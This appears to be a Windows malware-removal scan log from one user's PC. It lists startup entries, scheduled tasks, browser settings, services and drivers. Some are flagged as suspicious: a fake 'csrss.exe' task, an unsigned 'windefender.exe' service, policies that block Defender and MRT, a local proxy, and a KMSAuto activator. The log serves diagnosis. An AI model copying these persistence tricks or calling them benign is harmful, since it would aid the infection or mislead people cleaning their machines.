(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(Open Source Developer, Phillip Gibbons -> Highresolution Enterprises) C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(PACE Anti-Piracy, Inc. -> PACE Anti-Piracy, Inc.) C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe
(Polenter - Pawel Idzikowski -> Polenter - Software Solutions) C:\Program Files (x86)\Desktop-Reminder 2\DesktopReminder2.exe
(Reprise Software Inc.) [File not signed] C:\Program Files (x86)\The Foundry\LicensingTools7.0\bin\RLM\rlm.foundry.exe
(Reprise Software Inc.) [File not signed] C:\Program Files (x86)\The Foundry\LicensingTools7.0\bin\RLM\rlm.foundry.exe
(TeamViewer GmbH -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(WinAbility Software Corporation -> WinAbility® Software Corporation) C:\Program Files\IconShepherd\ISEXE64.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [638872 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [XMouseButtonControl] => C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe [1605856 2019-08-18] (Open Source Developer, Phillip Gibbons -> Highresolution Enterprises)
HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\System32\LogiLDA.dll [3933496 2012-09-20] (Logitech -> Logitech, Inc.)
HKLM\...\Run: [AsioReg] => REGSVR32.EXE /S CTASIO.DLL*
HKLM\...\Run: [LogiOptions] => C:\Program Files\Logitech\LogiOptions\LogiOptions.exe [2176648 2018-06-18] (Logitech Inc -> Logitech, Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-01-18] (Apple Inc. -> Apple Inc.)
HKLM\...\Run: [EvtMgr6] => C:\Program Files\Logitech\SetPointP\SetPoint.exe [3136136 2019-01-30] (Logitech Inc -> Logitech, Inc.)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [6260544 2019-11-14] (Dropbox, Inc -> Dropbox, Inc.)
HKLM-x32\...\Run: [AsioThk32Reg] => REGSVR32.EXE /S CTASIO.DLL
HKLM-x32\...\Run: [CTHelper] => C:\Windows\SysWOW64\CTHELPER.EXE* [23040 2009-02-23] () [File not signed]
HKLM-x32\...\Run: [CTxfiHlp] => C:\Windows\SysWOW64\CTXFIHLP.EXE* [23552 2009-02-23] () [File not signed]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [645648 2019-10-05] (Oracle America, Inc. -> Oracle Corporation)
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\ DisallowedCertificates: 7D4EAFF45C5D8A3E9AB24486D12F4B4F7F4DBB60 (U)
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518144 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3199776 2018-04-03] (Valve -> Valve Corporation)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [DesktopReminder2ByPolenter] => C:\Program Files (x86)\Desktop-Reminder 2\DesktopReminder2.exe [3164048 2017-06-21] (Polenter - Pawel Idzikowski -> Polenter - Software Solutions)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [SandboxieControl] => C:\Program Files\Sandboxie\SbieCtrl.exe [3682968 2019-04-22] (Invincea, Inc. -> Sandboxie Holdings, LLC)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [Viber] => C:\Users\SR\AppData\Local\Viber\Viber.exe [38564936 2019-10-30] (Viber Media S.à r.l. -> Viber Media S.à r.l.)
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Run: [CloudNet] => C:\Users\SR\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-11-25] (EpicNet Inc.) [File not signed] <==== ATTENTION
HKLM\Software\...\Authentication\Credential Providers: [{AA96996E-48DD-4D31-A94D-8563298A8C2D}] -> C:\WINDOWS\system32\WACP.dll [2016-09-20] (Softomotive Ltd -> )
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Icon Shepherd.lnk [2019-10-31]
ShortcutTarget: Icon Shepherd.lnk -> C:\Program Files\IconShepherd\ISEXE64.exe (WinAbility Software Corporation -> WinAbility® Software Corporation)
GroupPolicy: Restriction - Firefox <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0E55825A-221F-4E7A-9416-6D13AA06ABD8} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
Task: {12152F8B-CD2F-42DE-A539-041A8A936465} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {14324AB2-DEA1-4205-8D09-E4BC117610AE} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24668024 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
Task: {15D1F9B6-04A3-4972-A83C-EF0F4BBB8427} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [899056 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {1B9C5A1B-9321-46BB-84C5-DF45191FF376} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [648504 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {2208EA4A-30D8-45CC-8BDD-7FC3B05195B5} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1374008 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {42596E64-0421-415A-9C21-4EC99F971F53} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {66B093E3-0989-45FD-B21D-EE39713B7201} - System32\Tasks\KMSAutoNet => C:\ProgramData\KMSAutoS\KMSAuto Net.exe
Task: {78A0CAD1-8991-4E6C-966D-4E69097977E8} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {7F8AE7BB-B4DE-4B22-9729-1E5E19704D1A} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {881D3DFF-B43A-44C2-820D-F54679FAE900} - System32\Tasks\EPSON L130 Series Update {3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN6E.EXE [690536 2013-11-22] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
Task: {93894B49-495F-4FF7-A834-F07A572C2C25} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1374008 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {950BA929-9185-474B-B254-40BA3B8E3A1B} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [112976 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {962642C0-4430-4032-92EE-908F3A5F3E52} - System32\Tasks\ExclusiveTool => C:\Program Files (x86)\DSDCS\InputMapper\ExclusiveModeTool.exe [19968 2016-10-04] (InputMapper) [File not signed]
Task: {99C2988F-4978-44CF-9C99-C8698A7E4DD0} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [24668024 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
Task: {9D01F07B-9B7D-4D12-B21E-9C486ACCEC8C} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [3937792 2019-11-24] () [File not signed] <==== ATTENTION
Task: {9FAB49BF-9A8A-43A8-A5BF-493EE72EF726} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616320 2018-01-08] (Apple Inc. -> Apple Inc.)
Task: {A197B1E1-5017-44E1-8786-700A5A077A97} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [112976 2019-11-21] (Microsoft Corporation -> Microsoft Corporation)
Task: {A2CB4A3E-AFDC-43FA-98BA-0A92F7E5DABE} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [899056 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {A809944B-8D1B-4F63-BB06-E2CD920F61A2} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4321688 2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {AD74C57C-54F0-4805-B7A0-CB5A9FA03223} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2872400 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
Task: {B264C95D-A9B6-4D69-9B94-FB67D6DB757E} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
Task: {B69A753B-777A-4C1E-AA9D-1033C77839DE} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\WINDOWS\explorer.exe /NOUACCHECK
Task: {C68E190A-5D0C-40B1-895A-9522150D9369} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {CCC37DAD-9377-4ED5-80DB-F21C8D60E2E6} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {D34CA7D5-150E-4A42-9C1F-D72B477043A6} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {E02831A3-E4D2-410D-9AAC-0268EE1483DF} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MpCmdRun.exe [469928 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {F1C3AFE7-5B89-4B71-8D62-12804C3764B1} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1130296 2019-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F7413A74-A9B1-4E6A-91D4-0570477CA0ED} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3787304 2019-05-23] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {F9DCD18B-6730-49E0-8339-A8013E910822} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [4321688 2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Task: {FEF2A145-6CB7-48B3-827C-4FFCF30E20F1} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\EPSON L130 Series Update {3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSN6E.EXE:/EXE:{3D66A2C6-B96B-41F2-80E9-2A3BE5BE4140} /F:UpdateWORKGROUP\DESKTOP-A0OS1Q6$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

ProxyServer: [S-1-5-21-3967059023-4107875624-2872843465-1001] => http=127.0.0.1:8888;
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 1.1.1.1 1.0.0.1
Tcpip\..\Interfaces\{2a8e95f9-250a-4cdc-8d08-f661e3f2a913}: [DhcpNameServer] 1.1.1.1 1.0.0.1

Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope value is missing
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_231\bin\ssv.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2019-01-30] (Logitech Inc -> Logitech, Inc.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_231\bin\jp2ssv.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2019-01-30] (Logitech Inc -> Logitech, Inc.)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)

FireFox:
========
FF DefaultProfile: qyonbq05.default-1454591260015
FF ProfilePath: C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release [2019-11-25]
FF Notifications: Mozilla\Firefox\Profiles\dho1fb01.default-release -> hxxps://mail-notification.info
FF Extension: (DuckDuckGo Privacy Essentials) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\[email protected] [2019-10-27]
FF Extension: (Skip Redirect) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\[email protected] [2019-11-15]
FF Extension: (Adblocker Lite) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\dho1fb01.default-release\Extensions\{3596f810-bf50-47e2-b54a-2128ebdc5179}.xpi [2019-06-05]
FF ProfilePath: C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 [2019-11-25]
FF DownloadDir: D:\Users\SR\Downloads
FF NewTab: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> about:newtab
FF NetworkProxy: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> type", 0
FF Notifications: Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015 -> hxxps://mail-notification.info
FF Extension: (Disconnect) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-04-15]
FF Extension: (Grammarly for Firefox) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-02-04]
FF Extension: (AdGuard AdBlocker) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\[email protected] [2019-04-17]
FF Extension: (Block Site) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\{54e2eb33-18eb-46ad-a4e4-1329c29f6e17}.xpi [2019-05-01]
FF Extension: (Adblock Plus - free ad blocker) - C:\Users\SR\AppData\Roaming\Mozilla\Firefox\Profiles\qyonbq05.default-1454591260015\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2019-04-20]
FF HKLM-x32\...\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: (Logitech SetPoint) - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2019-10-19] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_32_0_0_223.dll [2019-08-04] (Adobe Inc. -> )
FF Plugin: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [No File]
FF Plugin: @java.com/DTPlugin,version=11.231.2 -> C:\Program Files\Java\jre1.8.0_231\bin\dtplugin\npDeployJava1.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.231.2 -> C:\Program Files\Java\jre1.8.0_231\bin\plugin2\npjp2.dll [2019-10-19] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-10-25] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_223.dll [2019-08-04] (Adobe Inc. -> )
FF Plugin-x32: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [No File]
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-10-25] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin HKU\S-1-5-21-3967059023-4107875624-2872843465-1001: tdameritrade.com/thinkorswim -> C:\Program Files\thinkorswim\npthinkorswim.dll [2019-08-29] (TD Ameritrade -> TD Ameritrade)
FF Plugin HKU\S-1-5-21-3967059023-4107875624-2872843465-1001: tdameritrade.com/tossc -> C:\Program Files\thinkorswim\nptossc.dll [2019-08-29] (TD Ameritrade -> TD Ameritrade)

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-10-25] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3147344 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2914896 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [85304 2018-10-16] (Apple Inc. -> Apple Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11341584 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
R2 DbxSvc; C:\WINDOWS\system32\DbxSvc.exe [51024 2019-11-14] (Dropbox, Inc -> Dropbox, Inc.)
U2 EPSON_PM_RPCV4_06; C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE [152640 2013-04-15] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION)
R2 FolderSize; C:\Program Files\FolderSize\FolderSizeSvc.exe [163840 2013-02-12] (Brio) [File not signed]
S2 Foundry FLEXlm Server; C:\Program Files (x86)\The Foundry\\LicensingTools7.0\bin\FLEXlm\lmgrd.foundry.exe [1392016 2012-10-30] (Acresso Software Inc. -> Acresso Software Inc.)
R2 Foundry License Server; C:\Program Files (x86)\The Foundry\\LicensingTools7.0\bin\RLM\rlm.foundry.exe [1474560 2017-06-15] (Reprise Software Inc.) [File not signed]
R2 InputMapper Cerberus Whitelister; C:\Program Files (x86)\DSDCS\InputMapper HidGuardian\InputMapperCerberusWhitelister.exe [14848 2017-04-21] () [File not signed]
R2 IpOverUsbSvc; C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [21304 2017-09-29] (Microsoft Corporation -> Microsoft Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6960640 2019-11-25] (Malwarebytes Inc -> Malwarebytes)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
R2 SbieSvc; C:\Program Files\Sandboxie\SbieSvc.exe [328344 2019-04-22] (Invincea, Inc. -> Sandboxie Holdings, LLC)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [4737448 2018-07-15] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11446104 2019-04-24] (TeamViewer GmbH -> TeamViewer GmbH)
S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [157480 2018-08-02] (Microsoft Corporation -> Microsoft Corporation)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\NisSrv.exe [3201616 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinAutomation Machine Agent; C:\Program Files\WinAutomation\WinAutomation.MachineAgent.exe [274496 2016-09-20] (Softomotive Ltd -> Softomotive)
S3 WinAutomation Service; C:\Program Files\WinAutomation\WinAutomation.Server.exe [885312 2016-09-20] (Softomotive Ltd -> Softomotive)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MsMpEng.exe [103168 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefender; C:\WINDOWS\windefender.exe [2079744 2019-11-24] () [File not signed]
S2 IBG_gds_db; D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7\bin\ibguard.exe -i "D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7" -p gds_db
S3 IBS_gds_db; D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7\bin\ibserver.exe -i "D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7" -p gds_db
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
R2 NvTelemetryContainer; "C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvTelemetry\plugins" -r
R2 PaceLicenseDServices; "C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe" -u https://activation.p...tiateActivation[X]

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 HidGuardian; C:\WINDOWS\System32\drivers\HidGuardian.sys [26736 2017-04-17] (Microsoft Windows Hardware Compatibility Publisher -> Benjamin Höglinger-Stelzer)
S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [55232 2018-02-11] (SurfRight B.V. -> )
